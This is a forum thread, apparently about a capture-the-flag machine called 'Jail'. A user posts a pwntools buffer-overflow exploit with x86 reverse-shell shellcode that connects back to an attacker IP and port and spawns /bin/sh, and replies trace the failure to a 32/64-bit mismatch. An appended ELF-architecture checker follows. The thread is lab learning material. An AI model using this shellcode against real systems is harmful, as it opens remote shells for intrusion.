Help with Jail Buffer exploit

Is there anyone that could help me out with the buffer overflow for jail?

I have created a buffer overflow following ippsec's tutorial, but for some reason I keep landing in my junk instead of landing in the buffer shellcode.

This is my exploit so far…

from pwn import *

HOST, PORT = 'MY IP', 7411

# Junk to get to EIP
junk = '\xCC'*28

# Memory leaked
mem = p32(0xffdc64c0 + 32)

# Shellcode to execute
buf = ''
buf += "\x68"
buf += REMOVED IP # <- IP Number
buf += "\x5e\x66\x68"
buf += "\xd9\x03" # <- Port Number "55555"
buf += "\x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02"
buf += "\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79"
buf += "\xf9\xb0\x66\x56\x66\x57\x66\x6a\x02\x89\xe1\x6a"
buf += "\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f"
buf += "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
buf += "\xeb\xce"

# Connect to host
p = remote(HOST, PORT)

p.recvuntil("OK Ready. Send USER command.")
p.sendline("USER admin")
p.recvuntil("OK Send PASS command.")
p.recvuntil("OK DEBUG mode on.")
p.sendline("PASS " + junk + mem + buf)


IPPSEC does the memory leak + 32, which includes the 28 needed to get to the overflow + the 4 needed for the mem. I have done this, but unfortunately I keep getting SIGSEGV and it is reading back the \xCC's.

Anyone notice what I am doing wrong? I am sure it will be something small that I am not over yet.

Disregard. 64 vs 32…

Were you able to get an msfvenom shellcode working, or did you have to use that one?

I'm sure you could get your own msfvenom one to work if the format is python.

But I was trying it on my machine first, when my Kali is 64-bit and the shellcode was 32-bit code.
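
Added example, not part of the original posts: the 32-bit versus 64-bit mismatch described in the last reply can be caught before any debugging by reading the ELF header of the binary used for local testing. The function names and the two sample headers are constructed for illustration, and checking the local test binary is an assumption about where the mismatch lay.

```python
import struct
import sys

# e_machine values from the ELF specification (subset)
MACHINES = {0x03: "x86", 0x3E: "x86-64", 0x28: "ARM", 0xB7: "AArch64"}

def elf_arch(header: bytes) -> dict:
    """Read word size, byte order and machine from the start of an ELF file."""
    if len(header) < 20 or header[:4] != b"\x7fELF":
        raise ValueError("not an ELF header")
    ei_class, ei_data = header[4], header[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        raise ValueError("invalid EI_CLASS or EI_DATA")
    order = "<" if ei_data == 1 else ">"
    # e_type and e_machine follow the 16-byte e_ident array
    _e_type, e_machine = struct.unpack_from(order + "HH", header, 16)
    return {
        "bits": 32 if ei_class == 1 else 64,
        "endian": "little" if ei_data == 1 else "big",
        "machine": MACHINES.get(e_machine, hex(e_machine)),
    }

def check_match(header: bytes, payload_bits: int, payload_machine: str) -> list:
    """Return a list of mismatches between a binary and the code meant for it."""
    info = elf_arch(header)
    problems = []
    if info["bits"] != payload_bits:
        problems.append(f"binary is {info['bits']}-bit, payload is {payload_bits}-bit")
    if info["machine"] != payload_machine:
        problems.append(f"binary is {info['machine']}, payload is {payload_machine}")
    return problems

# Constructed sample headers (e_ident + e_type + e_machine only)
SAMPLE_I386 = b"\x7fELF" + bytes([1, 1, 1, 0]) + bytes(8) + struct.pack("<HH", 2, 0x03)
SAMPLE_X86_64 = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8) + struct.pack("<HH", 2, 0x3E)

if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            head = fh.read(20)
    else:
        head = SAMPLE_X86_64
    print(elf_arch(head))
    for problem in check_match(head, 32, "x86"):
        print("mismatch:", problem)
```

Run with a path to check a real binary; with no argument it reports on the constructed 64-bit sample.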